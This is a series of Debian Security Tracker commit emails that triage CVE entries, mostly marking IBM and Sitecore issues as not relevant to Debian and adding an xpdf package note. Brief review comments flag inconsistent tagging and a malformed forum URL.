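Review bot: The added CVE-2019-12935 entry has no description text, unlike the entries around it, so nothing in the list ties the id to a Shopware issue. Record the source of the assignment in the commit message (currently just "NFU") so the classification can be checked later.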



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/940c3cb7d36f863e8a273c1441bd57c87765ef87


[Git][security-tracker-team/security-tracker][master] NFU

2019-06-06 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
213a65a3 by Henri Salo at 2019-06-06T08:26:58Z
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -21411,7 +21411,7 @@ CVE-2019-4222 (IBM Sterling B2B Integrator Standard 
Edition 6.0.0.0 and 6.0.0.1
 CVE-2019-4221
RESERVED
 CVE-2019-4220 (IBM InfoSphere Information Server 11.7.1.0 stores a common hard 
coded  ...)
-   TODO: check
+   NOT-FOR-US: IBM
 CVE-2019-4219
RESERVED
 CVE-2019-4218
@@ -21449,7 +21449,7 @@ CVE-2019-4203 (IBM API Connect 5.0.0.0 and 5.0.8.6 
Developer Portal can be explo
 CVE-2019-4202 (IBM API Connect 5.0.0.0 and 5.0.8.6 Developer Portal is 
vulnerable to  ...)
NOT-FOR-US: IBM
 CVE-2019-4201 (IBM Jazz for Service Management 1.1.3, 1.1.3.1, and 1.1.3.2 
could allo ...)
-   TODO: check
+   NOT-FOR-US: IBM
 CVE-2019-4200
RESERVED
 CVE-2019-4199
@@ -21739,7 +21739,7 @@ CVE-2019-4058 (IBM BigFix Platform 9.2 and 9.5 could 
allow a low-privilege user
 CVE-2019-4057
RESERVED
 CVE-2019-4056 (IBM Maximo Asset Management 7.6 Work Centers' application does 
not val ...)
-   TODO: check
+   NOT-FOR-US: IBM Maximo Asset Management
 CVE-2019-4055 (IBM MQ 8.0.0.0 through 8.0.0.10, 9.0.0.0 through 9.0.0.5, and 
9.1.0.0  ...)
NOT-FOR-US: IBM
 CVE-2019-4054
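Review bot: This commit tags IBM products two ways: "NOT-FOR-US: IBM Maximo Asset Management" in this hunk, but plain "NOT-FOR-US: IBM" for InfoSphere Information Server and Jazz for Service Management in the earlier hunks and for the existing CVE-2019-4055 entry just below. Settle on either vendor only or vendor plus product and use it for all five changed lines.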
@@ -21755,7 +21755,7 @@ CVE-2019-4050
 CVE-2019-4049
RESERVED
 CVE-2019-4048 (IBM Maximo Asset Management 7.6 could allow a physical user of 
the sys ...)
-   TODO: check
+   NOT-FOR-US: IBM Maximo Asset Management
 CVE-2019-4047 (IBM Jazz Reporting Service (JRS) 6.0.6 could allow an 
authenticated us ...)
NOT-FOR-US: IBM
 CVE-2019-4046 (IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is 
vulnerable  ...)
@@ -81848,7 +81848,7 @@ CVE-2018-2030
 CVE-2018-2029
RESERVED
 CVE-2018-2028 (IBM Maximo Asset Management 7.6 could allow a an authenticated 
user to ...)
-   TODO: check
+   NOT-FOR-US: IBM Maximo Asset Management
 CVE-2018-2027
RESERVED
 CVE-2018-2026 (IBM Financial Transaction Manager 3.2.1 for Digital Payments 
could all ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/213a65a32ab2e5594ef699153ff4a96282128d69


[Git][security-tracker-team/security-tracker][master] CVE-2019-12360/xpdf

2019-06-06 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b4551eb3 by Henri Salo at 2019-06-06T08:24:36Z
CVE-2019-12360/xpdf

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -850,6 +850,8 @@ CVE-2019-12362 (EmpireCMS 7.5.0 has XSS via the HTTP 
Referer header to e/member/
 CVE-2019-12361 (EmpireCMS 7.5.0 has XSS via the from parameter to 
e/member/doaction.ph ...)
NOT-FOR-US: EmpireCMS
 CVE-2019-12360 (A stack-based buffer over-read exists in 
FoFiTrueType::dumpString in f ...)
+   - xpdf 
+   NOTE: https://forum.xpdfreader.com/viewtopic.php?f=3=41801
TODO: check
 CVE-2019-12359
RESERVED
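Review bot: The query string in the added NOTE URL reads "f=3=41801", which is not a valid pair of parameters; check that the link as committed resolves to the xpdf forum report for FoFiTrueType::dumpString and correct it if it does not. "TODO: check" is also kept below the new package line, so confirm that further triage is intended.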



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/b4551eb3186112be1096eb386a3829af44168aa0


[Git][security-tracker-team/security-tracker][master] NFU

2019-06-06 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
fbd4f08c by Henri Salo at 2019-06-06T08:18:40Z
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -663,7 +663,7 @@ CVE-2019-12441 [Protected Branches Restriction Rules Bypass]
- gitlab  (bug #930004)
NOTE: 
https://about.gitlab.com/2019/06/03/security-release-gitlab-11-dot-11-dot-1-released/
 CVE-2019-12440 (The Sitecore Rocks plugin before 2.1.149 for Sitecore allows 
an unauth ...)
-   TODO: check
+   NOT-FOR-US: Sitecore CMS
 CVE-2019-12438
RESERVED
 CVE-2019-12437
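Review bot: CVE-2019-12440 is described as affecting "The Sitecore Rocks plugin before 2.1.149 for Sitecore", yet the new tag is "NOT-FOR-US: Sitecore CMS". Name the plugin in the tag (for example "Sitecore Rocks plugin for Sitecore") so it matches the affected component rather than the platform.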
@@ -7635,7 +7635,7 @@ CVE-2019-9877 (There is an invalid memory access 
vulnerability in the function T
 CVE-2019-9876
RESERVED
 CVE-2019-9875 (Deserialization of Untrusted Data in the anti CSRF module in 
Sitecore  ...)
-   TODO: check
+   NOT-FOR-US: Sitecore CMS
 CVE-2019-9874 (Deserialization of Untrusted Data in the 
Sitecore.Security.AntiCSRF (a ...)
NOT-FOR-US: Sitecore CMS
 CVE-2019-9873



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/fbd4f08ce932b1dcda34014062d6395865ae4f3f

